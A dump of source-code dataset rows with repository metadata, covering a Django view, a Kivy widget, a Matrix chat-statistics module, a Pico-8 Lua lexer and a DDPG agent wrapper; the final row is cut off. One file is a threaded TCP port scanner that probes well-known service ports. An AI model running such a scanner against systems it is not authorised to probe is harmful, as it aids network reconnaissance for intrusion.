blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1dc07947163f162841fac667cf4ec00bef3e681f | ec3a1a6787fc88d862e5e7476377d364a6437b1f | /restaurant/meals/views.py | 5ce99a2654fb2fc552dfa334f7c8e2432e0667da | [
"MIT"
] | permissive | alex-dsouza777/Seasonal-Tastes-Restaurant | a31f5d52504a05012a963149f2de8e8c7351f475 | 22d39ba6d1d353f66811641214fd386103270304 | refs/heads/main | 2023-07-17T17:51:05.422482 | 2021-09-07T09:56:25 | 2021-09-07T09:56:25 | 403,854,782 | 0 | 0 | null | 2021-09-07T09:50:24 | 2021-09-07T05:43:10 | HTML | UTF-8 | Python | false | false | 517 | py | from django.shortcuts import render
from . models import Meals, Category
# Create your views here.
def meal_list(request):
meal_list = Meals.objects.all()
categories = Category.objects.all()
context = {
"meal_list":meal_list,
"categories":categories,
}
return render(request,"meals/list.html",context)
def meal_detail(request,slug):
meal_detail = Meals.objects.get(slug=slug)
context = {'meal_detail':meal_detail}
return render(request,"meals/detail.html",context) | [
"alexdsouza00777@gmail.com"
] | alexdsouza00777@gmail.com |
5ecff5ad5fe3286e9a8e813f3c9de2d599229c34 | 781116645c0d60de13596aac81a76c791ed0c18a | /kivy_garden/flower/__init__.py | 6793aaafcc1aa355b42b381f1800e9714707bb6e | [
"MIT"
] | permissive | matham/flower | 503dae3446110da05ecd2a527b3459f7e1bcadb3 | e7c71346563573197ae304ceb343bff14e54a5cd | refs/heads/master | 2020-05-24T22:33:43.761720 | 2019-05-19T08:56:14 | 2019-05-19T08:56:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | """
Demo flower
============
Defines the Kivy garden :class:`FlowerLabel` class which is the widget provided
by the demo flower.
"""
from kivy.uix.label import Label
__all__ = ('FlowerLabel', )
__version__ = '0.1.0.dev0'
class FlowerLabel(Label):
def __init__(self, **kwargs):
super(FlowerLabel, self).__init__(**kwargs, text='Demo flower')
| [
"moiein2000@gmail.com"
] | moiein2000@gmail.com |
0c6c18f30e29a079c85f04ab0a9b5d59618dad5d | 229e9750b9acd0092d5d021c42c4fd1f609b8b8a | /Python/pig_it.py | e2a4942a469bcf90dd242a7312ff4634fda8f6eb | [] | no_license | idellang/codewars | aad1c3becf2c6f600ccb45efd5c7fc5d0acf08a2 | 1e09b5f59342136d4a8010580a78a30b916890f8 | refs/heads/master | 2023-03-27T16:57:24.966851 | 2021-03-14T07:11:45 | 2021-03-14T07:11:45 | 343,757,741 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 275 | py | def pig_it(text):
ans = []
list_text = text.split(" ")
for text in list_text:
if text.isalpha():
ans.append(text[1:] + text[0] + "ay")
else:
ans.append(text)
return " ".join(ans)
print(pig_it("O tempora o mores !"))
| [
"jfcastaneda@up.edu.ph"
] | jfcastaneda@up.edu.ph |
d5fd5d05d76dd805abbb7f51983ab43ceb1f169c | 108cdb1a467e2569ee1197f66bb773fa172f4b4a | /lib/core/portscan.py | db3f6a713edc45c10d3815a64aa12d3b6ef1f806 | [] | no_license | Da7uraN0ir/scanner-based-spider | 0821853cb55a1d0c71676595541f6a7c66490ba1 | 2e588b760b1fa08d0dd8ad50ca83dc57121bec8b | refs/heads/master | 2020-03-07T05:15:20.626595 | 2018-04-08T07:42:41 | 2018-04-08T07:42:41 | 127,290,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,070 | py | import socket
import threading
import Queue
class portscan:
def __init__(self,ip="localhost",threadnum=5):
self.PORT = {80: "web", 8080: "web", 3311: "kangle", 3312: "kangle", 3389: "mstsc", 4440: "rundeck",
5672: "rabbitMQ", 5900: "vnc", 6082: "varnish", 7001: "weblogic", 8161: "activeMQ",
8649: "ganglia", 9000: "fastcgi", 9090: "ibm", 9200: "elasticsearch", 9300: "elasticsearch",
9999: "amg", 10050: "zabbix", 11211: "memcache", 27017: "mongodb", 28017: "mondodb",
3777: "dahua jiankong", 50000: "sap netweaver", 50060: "hadoop", 50070: "hadoop", 21: "ftp",
22: "ssh", 23: "telnet", 25: "smtp", 53: "dns", 123: "ntp", 161: "snmp", 8161: "snmp", 162: "snmp",
389: "ldap", 443: "ssl", 512: "rlogin", 513: "rlogin", 873: "rsync", 1433: "mssql", 1080: "socks",
1521: "oracle", 1900: "bes", 2049: "nfs", 2601: "zebra", 2604: "zebra", 2082: "cpanle",
2083: "cpanle", 3128: "squid", 3312: "squid", 3306: "mysql", 4899: "radmin", 8834: 'nessus',
4848: 'glashfish'}
self.threadnum = threadnum
self.q = Queue.Queue()
self.ip = ip
for port in self.PORT.keys():
self.q.put(port)
def _th_scan(self):
while not self.q.empty():
port = self.q.get()
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(1)
try:
s.connect((self.ip,port))
print "%s:%s OPEN [%s]"%(self.ip,port,self.PORT[port])
except:
print "%s:%s Close"%(self.ip,port)
finally:
s.close()
def work(self):
threads = []
for i in range(self.threadnum):
t = threading.Thread(target=self._th_scan())
threads.append(t)
t.start()
for t in threads:
t.join()
print ('[*] The scan is complete!')
| [
"1061919665@qq.com"
] | 1061919665@qq.com |
b341d8e48eb23d4b830ebca10113720caf32a3d5 | d9f85e88424c03072b2939e1e0681c4a28595c91 | /matrixstats.py | 029f8de3b6299f5014b614f677c049cae10ec691 | [
"BSD-2-Clause"
] | permissive | Cadair/chat_stats | 1d826377c95462d555a3d5df1a840f1b9f32c9b3 | c34648d80b67f8e66a9a8adcad92147644ad7923 | refs/heads/master | 2022-09-05T21:26:13.611506 | 2022-08-05T10:22:33 | 2022-08-05T10:22:33 | 160,004,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,373 | py | """
This file contains a set of helpers for analysing the history of groups of
matrix rooms.
"""
import unicodedata
import re
import datetime
from urllib.parse import quote
from collections import defaultdict
from matrix_client.errors import MatrixRequestError
import pandas as pd
import numpy as np
__all__ = ['get_rooms_in_space', 'calculate_active_senders', 'get_display_names', 'load_messages', 'get_len_key', 'flatten_dicts', 'filter_events_by_messages', 'print_sorted_value',
'print_sorted_len', 'get_rooms_in_community', 'events_to_dataframe',
'get_all_messages_for_room', 'get_all_events']
def slugify(value, allow_unicode=False):
"""
Taken from https://github.com/django/django/blob/master/django/utils/text.py
Convert to ASCII if 'allow_unicode' is False. Convert spaces or repeated
dashes to single dashes. Remove characters that aren't alphanumerics,
underscores, or hyphens. Convert to lowercase. Also strip leading and
trailing whitespace, dashes, and underscores.
"""
value = str(value)
if allow_unicode:
value = unicodedata.normalize('NFKC', value)
else:
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')
value = re.sub(r'[^\w\s-]', '', value.lower())
return re.sub(r'[-\s]+', '-', value).strip('-_')
def get_all_messages_for_room(api, room_id, stop_time=None):
"""
Use the matrix ``/messages`` API to back-paginate through the whole history
of a room.
This will probably not work unless your homeserver has all the events
locally.
"""
token = ""
messages = []
try:
token = api.get_room_messages(room_id, token, "b")['end']
except MatrixRequestError:
print("Can't get messages for room...")
return messages
for i in range(100):
try:
m1 = api.get_room_messages(room_id, token, "b", limit=5000)
except MatrixRequestError:
break
if not m1['chunk']:
break
token = m1['end']
# TODO: I am pretty sure this doesn't work
if stop_time:
stop_time = int(pd.Timestamp("2019/01/01").to_pydatetime().timestamp()*1000)
times = [e['origin_server_ts'] for e in m1['chunk']]
stopping = np.less(times, stop_time).nonzero()[0]
if len(stopping) > (len(times)/1.1):
messages += m1['chunk']
return messages
messages += m1['chunk']
return messages
def events_to_dataframe(list_o_json):
"""
Given a list of json events extract the interesting info into a pandas
Dataframe.
"""
extract_keys = ("origin_server_ts", "sender",
"event_id", "type", "content")
df = defaultdict(list)
df["body"] = []
for event in list_o_json:
if "body" in event['content']:
df["body"].append(event['content']['body'])
else:
df['body'].append(None)
for k in extract_keys:
v = event[k]
df[k].append(v)
df["origin_server_ts"] = [datetime.datetime.fromtimestamp(ts/1000) for ts in df['origin_server_ts']]
return pd.DataFrame(df).set_index("origin_server_ts")
def get_all_events(api, rooms, cache=None, refresh_cache=False, stop_time=None):
"""
Get all events in rooms.
If cache is a filename it will be loaded with `pandas.HDFStore`,
if refresh_cache is true then the cache will be saved after
getting the messages from the server.
"""
# key = slugify(key).replace("-", "_")
if cache and not refresh_cache:
store = pd.HDFStore(cache)
cache = {key[1:]: store.get(key) for key in store.keys()}
missing_keys = rooms.keys() - cache.keys()
for key in missing_keys:
print(f"fetching events for {key}")
cache[key] = events_to_dataframe(get_all_messages_for_room(api, rooms[key], stop_time=stop_time))
store[key] = cache[key]
for key in cache.keys() - rooms.keys():
cache.pop(key)
store.close()
return cache
else:
messages = {}
with pd.HDFStore(cache) as store:
for key, id in rooms.items():
print(f"fetching events for {key}")
df = events_to_dataframe(get_all_messages_for_room(api, id, stop_time=stop_time))
messages[key] = df
store.put(key, df)
return messages
def get_rooms_in_community(api, communtiy):
"""
Get a mapping of canonical alias (localpart) to room id for all rooms in a
communtiy.
"""
rooms = api._send("GET", "/groups/{}/rooms".format(quote(communtiy)))
ids = {}
for room in rooms['chunk']:
ca = room.get('canonical_alias')
if not ca:
continue
name = ca.split(":")[0][1:]
name = name.replace("-", "_")
ids[name] = room['room_id']
return ids
def get_rooms_in_space(api, space, recursive=False):
"""
Get a mapping of name to room id for all rooms in a
space.
If recursive is true then rooms from all subspaces will be listed.
"""
space_roomid = space
if space.startswith("#"):
space_roomid = api.get_room_id(space)
room_create = api._send("GET", f"/rooms/{quote(space_roomid)}/state/m.room.create")
if room_create["type"] != "m.space":
raise TypeError("Room is not a space")
room_state = api._send("GET", f"/rooms/{quote(space_roomid)}/state")
ids = {}
for event in room_state:
if event["type"] != "m.space.child":
continue
room_id = event["state_key"]
room_state = api._send("GET", f"/rooms/{quote(room_id)}/state")
create = [ev for ev in room_state if ev["type"] == "m.room.create"][0]
if create["content"].get("type") == "m.space":
continue
name = [ev for ev in room_state if ev["type"] == "m.room.name"]
if not name:
print(f"Room {room_id} has no name, skipping")
continue
name = name[0]["content"]["name"]
ids[name] = room_id
return ids
def get_room_aliases_in_community(api, community):
rooms = api._send("GET", "/groups/{}/rooms".format(quote(community)))
ids = {}
for room in rooms['chunk']:
ca = room.get('canonical_alias')
if not ca:
continue
name = ca.split(":")[0][1:]
name = name.replace("-", "_")
ids[name] = ca
return ids
def print_sorted_len(adict, reverse=True):
for k in sorted(adict, key=lambda k: len(adict[k]), reverse=reverse):
m = adict[k]
print(f"{k}: {len(m)}")
def print_sorted_value(adict, reverse=True):
for k in sorted(adict, key=adict.__getitem__, reverse=reverse):
m = adict[k]
print(f"{k}: {m}")
def filter_events_by_messages(events, ignore_github=False):
"""
Filter events so that only "m.room.message" events are kept.
events should be a dict of room events as returned by ``get_all_events``.
"""
messages = {k: v[v['type'] == "m.room.message"] for k, v in events.items()}
if ignore_github:
messages = {k: v[v['sender'] != "@_neb_github_=40_cadair=3amatrix.org:matrix.org"] for k, v in messages.items()}
return messages
def flatten_dicts(dicts):
"""
Flatten all the dicts, but assume there are no key conflicts.
"""
out = {}
for adict in dicts.values():
for key, value in adict.items():
out[key] = value
return out
def get_display_names(api, senders, template=None):
display_names = []
for s in senders:
m = True
if s == "@Cadair:matrix.org":
s = "@cadair:cadair.com"
if template is not None and ":" not in s:
s = template.format(s=s)
m = False
try:
dn = api.get_display_name(s)
except Exception:
dn = s
if m:
dn += "*"
display_names.append(dn)
return display_names
def load_messages(api, ids, refresh_cache=False,
stop_time=None, ignore_github=False,
ignore_rooms=None):
# Get all the messages in all the rooms
events = {group: get_all_events(api, cids, cache=f"{group}_messages.h5",
refresh_cache=refresh_cache,
stop_time=stop_time)
for group, cids in ids.items()}
if not ignore_rooms:
ignore_rooms = []
events = {group: {k: v for k, v in events.items() if not v.empty and k not in ignore_rooms}
for group, events in events.items()}
# Filter by actual messages
messages = {group: filter_events_by_messages(gevents) for group, gevents in events.items()}
for gmessages in messages.values():
for m in gmessages.values():
m.loc[:, 'usender'] = [a.split(":")[0][1:].split("_")[-1] if "slack" in a else a for a in m['sender']]
# Add a message length column
for gmessages in messages.values():
for group, df in gmessages.items():
x = df['body'].apply(lambda x: len(x) if x else 0)
df.loc[:, 'body_len'] = x
return events, messages
def get_len_key(adict, reverse=True):
n_messages = {}
for k in sorted(adict, key=lambda k: len(adict[k]), reverse=reverse):
m = adict[k]
n_messages[k] = len(m)
return n_messages
def calculate_active_senders(api, all_messages, top_n=20, template=None):
"""
Return a top_n long df group of number of messages and average length.
"""
groupbys = {group: am.groupby("usender") for group, am in all_messages.items()}
active_senders = {group: pd.DataFrame(groupby.count()['body'].sort_values(ascending=False))
for group, groupby in groupbys.items()}
for group, df in active_senders.items():
df.columns = ['number_of_messages']
df['mean_body_len'] = groupbys[group].mean()
df['median_body_len'] = groupbys[group].median()
for group, df in active_senders.items():
df.loc[:top_n, 'display_name'] = get_display_names(api, df.index[:top_n], template=template)
df = df[:top_n]
df = df.reset_index()
df = df.set_index("display_name")
active_senders[group] = df
return active_senders
| [
"stuart@cadair.com"
] | stuart@cadair.com |
d30e87902b060e3ee5ffe9249453e0c1c1b3b2ec | 8aefe8287b195165edf796b814d931a3399d7fe3 | /users.py | 35c37ea4d56e02db5eced03ba7d09d18a027deab | [
"MIT"
] | permissive | lchebib/room-to-grow-plant-daycare | a77de6c9aad16c6f742ef6d06f3bd1eb6ecd87d0 | 71f78ec863f61759dffd3f18a5bf18d1c02cc244 | refs/heads/master | 2023-02-03T08:11:07.282727 | 2020-12-21T01:28:40 | 2020-12-21T01:28:40 | 318,349,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,476 | py | import sqlite3
# information we need: user name, user location, user instances of plants
# users
# name
# location
# plants
# breed
# name
#need to to create two tables one for our users and one for out plants
#each plant instance will have a property tied to the user so when we want to recall a certain plant we know which user it belongs to
# c = conn.cursor()
# c.execute("CREATE TABLE users (username TEXT);")
# def plantCreator(name, breed):
# newPlant = Plant(name,breed )
# query = "INSERT INTO users SELECT (?)"
# c.execute(query, name, breed)
# def insertUser(user):
# # data = (name,zip, newPlant)
# query = "INSERT INTO users VALUES (?,)"
# c.execute(query,user)
# conn.commit()
# conn.close()
conn = sqlite3.connect("users.db")
def create_user_info():
c = conn.cursor()
c.execute('CREATE TABLE IF NOT EXISTS user_info (username TEXT, name TEXT, zipcode BLOB)')
c.close()
def enter_user_info(user):
c = conn.cursor()
data = (user.username, user.name, user.location)
query = "INSERT INTO user_info VALUES (?,?,?)"
c.execute(query, data)
conn.commit()
c.close()
def create_plant_info():
c = conn.cursor()
c.execute('CREATE TABLE IF NOT EXISTS plant_info (name TEXT, breed TEXT, owner TEXT)')
c.close()
def enter_plant_info(plant):
c = conn.cursor()
data = (plant.name, plant.breed, plant.owner)
query = "INSERT INTO plant_info VALUES (?,?,?)"
c.execute(query, data)
conn.commit()
c.close() | [
"lanachebib@Lanas-MacBook-Pro.local"
] | lanachebib@Lanas-MacBook-Pro.local |
2d8b849c119f6ad6fb792acbc74b43a0617ac741 | 23d7690ae4c6d083e55672882a1823c932d33a8f | /pico8/lua/lexer.py | 923405963ac64b089250943955f587c36bcaa993 | [
"MIT"
] | permissive | andmatand/midi-to-pico8 | e42dfb11eeefe0a4b97c216fe8844c45346cfbe7 | 371e52a584631d668ed127f7d43678cd0916fc1f | refs/heads/master | 2020-11-30T14:04:18.595377 | 2017-10-21T22:20:53 | 2017-10-21T22:20:53 | 66,683,076 | 58 | 4 | null | null | null | null | UTF-8 | Python | false | false | 11,526 | py | """The Lua lexer."""
import re
from .. import util
__all__ = [
'LexerError',
'Token',
'TokSpace',
'TokNewline',
'TokComment',
'TokString',
'TokNumber',
'TokName',
'TokLabel',
'TokKeyword',
'TokSymbol',
'Lexer',
'LUA_KEYWORDS'
]
LUA_KEYWORDS = {
'and', 'break', 'do', 'else', 'elseif', 'end', 'false', 'for',
'function', 'goto', 'if', 'in', 'local', 'nil', 'not', 'or', 'repeat',
'return', 'then', 'true', 'until', 'while'
}
class LexerError(util.InvalidP8DataError):
"""A lexer error."""
def __init__(self, msg, lineno, charno):
self.msg = msg
self.lineno = lineno
self.charno = charno
def __str__(self):
return '{} at line {} char {}'.format(
self.msg, self.lineno, self.charno)
class Token():
"""A base class for all tokens."""
def __init__(self, data, lineno=None, charno=None):
"""Initializer.
Args:
data: The code data for the token.
lineno: The source file line number of the first character.
charno: The character number on the line of the first character.
"""
self._data = data
self._lineno = lineno
self._charno = charno
def __len__(self):
"""The length of the code string for the token."""
return len(self.code)
def __repr__(self):
"""A textual representation for debugging."""
return '{}<{}, line {} char {}>'.format(
self.__class__.__name__, repr(self._data),
self._lineno, self._charno)
def __eq__(self, other):
"""Equality operator.
Two tokens are equal if they are of the same type and have
equal data. Positions are insignificant.
Args:
other: The other Token to compare.
"""
if (type(self) != type(other) or
not isinstance(self, other.__class__)):
return False
if (isinstance(self, TokKeyword) and
isinstance(other, TokKeyword)):
return self._data.lower() == other._data.lower()
return self._data == other._data
def matches(self, other):
"""Matches the token against either a token class or token data.
This is shorthand for the parser, which either wants to know
whether the token is of a particular kind (e.g. a TokName) or
of a particular value (a specific TokSymbol or TokKeyword).
Args:
other: The other Token to compare.
"""
if isinstance(other, type):
return isinstance(self, other)
return self == other
@property
def value(self):
"""The parsed value of the token."""
return self._data
@property
def code(self):
"""The original code of the token."""
return self._data
class TokSpace(Token):
"""A block of whitespace, not including newlines."""
name = 'whitespace'
class TokNewline(Token):
"""A single newline."""
name = 'newline'
class TokComment(Token):
"""A Lua comment, including the '--' characters."""
name = 'comment'
class TokString(Token):
"""A string literal."""
name = 'string literal'
def __init__(self, *args, **kwargs):
if 'quote' in kwargs:
self._quote = kwargs['quote']
del kwargs['quote']
else:
self._quote = '"'
super().__init__(*args, **kwargs)
@property
def code(self):
escaped_chrs = []
for c in self._data:
if c in _STRING_REVERSE_ESCAPES:
escaped_chrs.append('\\' + _STRING_REVERSE_ESCAPES[c])
elif c == self._quote:
escaped_chrs.append('\\' + c)
else:
escaped_chrs.append(c)
return self._quote + ''.join(escaped_chrs) + self._quote
class TokNumber(Token):
"""A number literal.
Negative number literals are tokenized as two tokens: a
TokSymbol('-'), and a TokNumber(...) representing the non-negative
number part.
"""
name = 'number'
# self._data is the original string representation of the number,
# so we don't have to jump through hoops to recreate it later.
@property
def value(self):
return float(self._data)
class TokName(Token):
"""A variable or function name."""
name = 'name'
class TokLabel(Token):
"""A goto label."""
name = 'label'
class TokKeyword(Token):
"""A Lua keyword."""
name = 'keyword'
class TokSymbol(Token):
"""A Lua symbol."""
name = 'symbol'
# A mapping of characters that can be escaped in Lua string literals using a
# "\" character, mapped to their unescaped values.
_STRING_ESCAPES = {
'\n': '\n', 'a': '\a', 'b': '\b', 'f': '\f', 'n': '\n',
'r': '\r', 't': '\t', 'v': '\v', '\\': '\\', '"': '"',
"'": "'"
}
_STRING_REVERSE_ESCAPES = dict((v,k) for k,v in _STRING_ESCAPES.items())
del _STRING_REVERSE_ESCAPES["'"]
del _STRING_REVERSE_ESCAPES['"']
# A list of single-line token matching patterns and corresponding token
# classes. A token class of None causes the lexer to consume the pattern
# without emitting a token. The patterns are matched in order.
_TOKEN_MATCHERS = []
_TOKEN_MATCHERS.extend([
(re.compile(r'--.*'), TokComment),
(re.compile(r'[ \t]+'), TokSpace),
(re.compile(r'\r\n'), TokNewline),
(re.compile(r'\n'), TokNewline),
(re.compile(r'\r'), TokNewline),
(re.compile(r'0[xX][0-9a-fA-F]+(\.[0-9a-fA-F]+)?'), TokNumber),
(re.compile(r'0[xX]\.[0-9a-fA-F]+'), TokNumber),
(re.compile(r'[0-9]+(\.[0-9]+)?([eE]-?[0-9]+)?'), TokNumber),
(re.compile(r'\.[0-9]+([eE]-?[0-9]+)?'), TokNumber),
(re.compile(r'::[a-zA-Z_][a-zA-Z0-9_]*::'), TokLabel),
])
_TOKEN_MATCHERS.extend([
(re.compile(r'\b'+keyword+r'\b'), TokKeyword) for keyword in LUA_KEYWORDS])
_TOKEN_MATCHERS.extend([
(re.compile(symbol), TokSymbol) for symbol in [
r'\+=', '-=', r'\*=', '/=', '%=',
'==', '~=', '!=', '<=', '>=',
r'\+', '-', r'\*', '/', '%', r'\^', '#',
'<', '>', '=',
r'\(', r'\)', '{', '}', r'\[', r'\]', ';', ':', ',',
r'\.\.\.', r'\.\.', r'\.']])
_TOKEN_MATCHERS.extend([
(re.compile(r'[a-zA-Z_][a-zA-Z0-9_]*'), TokName)
])
class Lexer():
"""The lexer.
A lexer object maintains state between calls to process_line() to
manage tokens that span multiple lines.
"""
def __init__(self, version):
"""Initializer.
Args:
version: The Pico-8 data version from the game file header.
"""
self._version = version
self._tokens = []
self._cur_lineno = 0
self._cur_charno = 0
# If inside a string literal (else None):
# * the pos of the start of the string
self._in_string_lineno = None
self._in_string_charno = None
# * a list of chars
self._in_string = None
# * the starting delimiter, either " or '
self._in_string_delim = None
def _process_token(self, s):
"""Process a token's worth of chars from a string, if possible.
If a token is found, it is added to self._tokens. A call might
process characters but not emit a token.
Args:
s: The string to process.
Returns:
The number of characters processed from the beginning of the string.
"""
i = 0
# TODO: Pico-8 doesn't allow multiline strings, so this probably
# shouldn't either.
if self._in_string is not None:
# Continue string literal.
while i < len(s):
c = s[i]
if c == self._in_string_delim:
# End string literal.
self._tokens.append(
TokString(str(''.join(self._in_string)),
self._in_string_lineno,
self._in_string_charno,
quote=self._in_string_delim))
self._in_string_delim = None
self._in_string_lineno = None
self._in_string_charno = None
self._in_string = None
i += 1
break
if c == '\\':
# Escape character.
num_m = re.match(r'\d{1,3}', s[i+1:])
if num_m:
c = chr(int(num_m.group(0)))
i += len(num_m.group(0))
else:
next_c = s[i+1]
if next_c in _STRING_ESCAPES:
c = _STRING_ESCAPES[next_c]
i += 1
self._in_string.append(c)
i += 1
elif s.startswith("'") or s.startswith('"'):
# Begin string literal.
self._in_string_delim = s[0]
self._in_string_lineno = self._cur_lineno
self._in_string_charno = self._cur_charno
self._in_string = []
i = 1
else:
# Match one-line patterns.
for (pat, tok_class) in _TOKEN_MATCHERS:
m = pat.match(s)
if m:
if tok_class is not None:
token = tok_class(m.group(0),
self._cur_lineno,
self._cur_charno)
self._tokens.append(token)
i = len(m.group(0))
break
for c in s[:i]:
if c == '\n':
self._cur_lineno += 1
self._cur_charno = 0
else:
self._cur_charno += 1
return i
def _process_line(self, line):
"""Processes a line of Lua source code.
The line does not have to be a complete Lua statement or
block. However, complete and valid code must have been
processed before you can call a write_*() method.
Args:
line: The line of Lua source.
Raises:
LexerError: The line contains text that could not be mapped to known
tokens (a syntax error).
"""
i = 0
while True:
i = self._process_token(line)
if i == 0:
break
line = line[i:]
if line:
raise LexerError('Syntax error (remaining:%r)' % (line,),
self._cur_lineno + 1,
self._cur_charno + 1)
def process_lines(self, lines):
"""Process lines of Lua code.
Args:
lines: The Lua code to process, as an iterable of strings. Newline
characters are expected to appear in the strings as they do in the
original source, though each string in lines need not end with a
newline.
"""
for line in lines:
self._process_line(line)
@property
def tokens(self):
"""The tokens produced by the lexer.
This includes TokComment, TokSpace, and TokNewline
tokens. These are not tokens of the Lua grammar, but are
needed to reconstruct the original source with its formatting,
or to reformat the original source while preserving comments
and newlines.
"""
return self._tokens
| [
"andrewloveskitties@gmail.com"
] | andrewloveskitties@gmail.com |
8cd7aac808f9f78c1c4742d8f5ed18403fccda45 | 71268b559e076fc1a11be580158b8ba26bf6f057 | /batchInvertTrack.py | 1f7f3d43369829b68d861cfdea3c387698a3df79 | [] | no_license | feganflamer035/flame-family | 69f99f2fbc86de8a3e88237fb1db1435dcac39ca | a8b16c907cc4df7254ad2ba5b759d6a574bc3e60 | refs/heads/master | 2020-05-27T02:33:45.792510 | 2019-05-24T16:35:23 | 2019-05-24T16:35:23 | 188,453,345 | 1 | 0 | null | 2019-05-24T16:17:50 | 2019-05-24T16:17:50 | null | UTF-8 | Python | false | false | 1,830 | py | def getCustomUIActions():
def invertTrack(selection):
import flame, os, commands, subprocess, random
for item in selection:
action = flame.batch.current_node.get_value()
current = action.current_node.get_value()
axisInvert = action.create_node("Axis")
randomNum = ''.join(random.choice('1234156789') for i in range(3))
axisInvert.name="Invert_Axis_" + randomNum
x, y, z = current.position.get_value()
posX = x * -1
posY = y * -1
posZ = z * -1
axisInvert.position=(posX, posY, posZ)
x, y, z = current.rotation.get_value()
rotX = x * -1
rotY = y * -1
rotZ = z * -1
axisInvert.rotation=(rotX, rotY, rotZ)
x, y, z = current.scale.get_value()
scaleX = 100 - x
scale2X = scaleX +100
scaleY = 100 - y
scale2Y = scaleY + 100
scaleZ = 100
axisInvert.scale=(scale2X, scale2Y, scaleZ)
x, y, z = current.shear.get_value()
shearX = x * -1
shearY = y * -1
shearZ = z * -1
axisInvert.shear=(shearX, shearY, shearZ)
x, y, z = current.center.get_value()
centerX = x * -1
centerY = y * -1
centerZ = z * -1
axisInvert.center=(centerX, centerY, centerZ)
for node in action.nodes:
if 'Axis' in node.name.get_value():
action.connect_nodes(axisInvert, current)
return [
{
"name": "PYTHON: NODES",
"actions": [
{
"name": "Invert Track",
"execute": invertTrack
}
]
}
]
| [
"noreply@github.com"
] | noreply@github.com |
293787f3c48cc3c3ced989ce8523a28c173701d2 | cdab89747a02414d6126e7fa4897b6decb9176ce | /manage.py | c1a6de13ffefeeef8d6135be653a03951d9b7144 | [] | no_license | OA31C/RentingCar | 6e964bcb01e53341e057d635f3327a9b9a9da962 | ba1c2c6e49c5ecf98a2fe5dad289ef01b0baa803 | refs/heads/master | 2022-12-20T12:49:15.935533 | 2020-10-10T17:07:18 | 2020-10-10T17:07:18 | 298,558,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'renting_car.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"OA3IC.QV@gmail.com"
] | OA3IC.QV@gmail.com |
2b1e82719e10753198ea8df678dabb25879741f4 | ac894b7f69a6523151a870218125193c0dc6d203 | /lesson one/24.py | b18ec62a7ed9fadf81b10aeb1288a39abf83af67 | [] | no_license | vincentdf/python | aded2a539af3f1432c5f7d9018bb8069a5c97656 | 00af94c49d8efa8c7b04a02192a4850bac4257b7 | refs/heads/master | 2021-04-15T11:18:10.907592 | 2018-03-23T09:12:28 | 2018-03-23T09:12:28 | 126,456,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | #!/usr/bin/python
# coding=utf-8
"""
题目:有一分数序列:2/1,3/2,5/3,8/5,13/8,21/13...求出这个数列的前20项之和。
程序分析:请抓住分子与分母的变化规律。
"""
n=2
m=1
j=0
for i in range (20):
j=n/m+j
# print j,n,m
# print j
n,m=m+n,n
print n,"/",m | [
"Durple@promote.cache-dns.local"
] | Durple@promote.cache-dns.local |
fa27baa0dca7aa2ef4790da7dbdd1d4f257aa105 | 0444fe93180ade854d3a59a62f4757bdab5e3477 | /sourcecode/Archieve/DDPGMultiAgent.py | 4d47169e5deb642068d21ce30c28bca2d51c3446 | [] | no_license | SENC/AiTennis | e2485a19e03c0ad6f8d30da15bc6b0a992e21113 | cdd08eecf0cde475b419afa9a6972498a05c4ddb | refs/heads/master | 2022-12-15T12:51:23.819817 | 2020-09-12T06:51:05 | 2020-09-12T06:51:05 | 286,974,930 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 837 | py | from agent import DDPGAgent
import torch
import numpy as np
class DDPGMultiAgent:
def __init__(self, state_size,action_size,num_agents):
super(DDPGMultiAgent,self).__init__()
self.gamma = 0.997
self.multiagent = [DDPGAgent (state_size,action_size) for agent in range(num_agents)]
def __iter__(self):
return [ agent for agent in self.multiagent]
def act(self, env_states):
actions = [ agent.act(states) for agent,states in zip(self.multiagent,env_states)]
return actions
#Learn from Replay Memory
def learn(self, experiences,gamma):
#self.multiagent[agent_number].learn(experiences, self.gamma)
[agent.learn(experiences,gamma) for agent in self.multiagent]
def resetNoise(self):
[agent.resetNoise() for agent in self.multiagent] | [
"SENTHILC78@HOTMAIL.COM"
] | SENTHILC78@HOTMAIL.COM |
12ee5f4eac1540065a246d0a64ab8a9b07db7924 | 60121a94a0ae99c1993f4231bf5caa20968d0d4b | /vision.py | 36f025377c9c37d2f8749e17b7a919b8e93c2fe7 | [
"MIT"
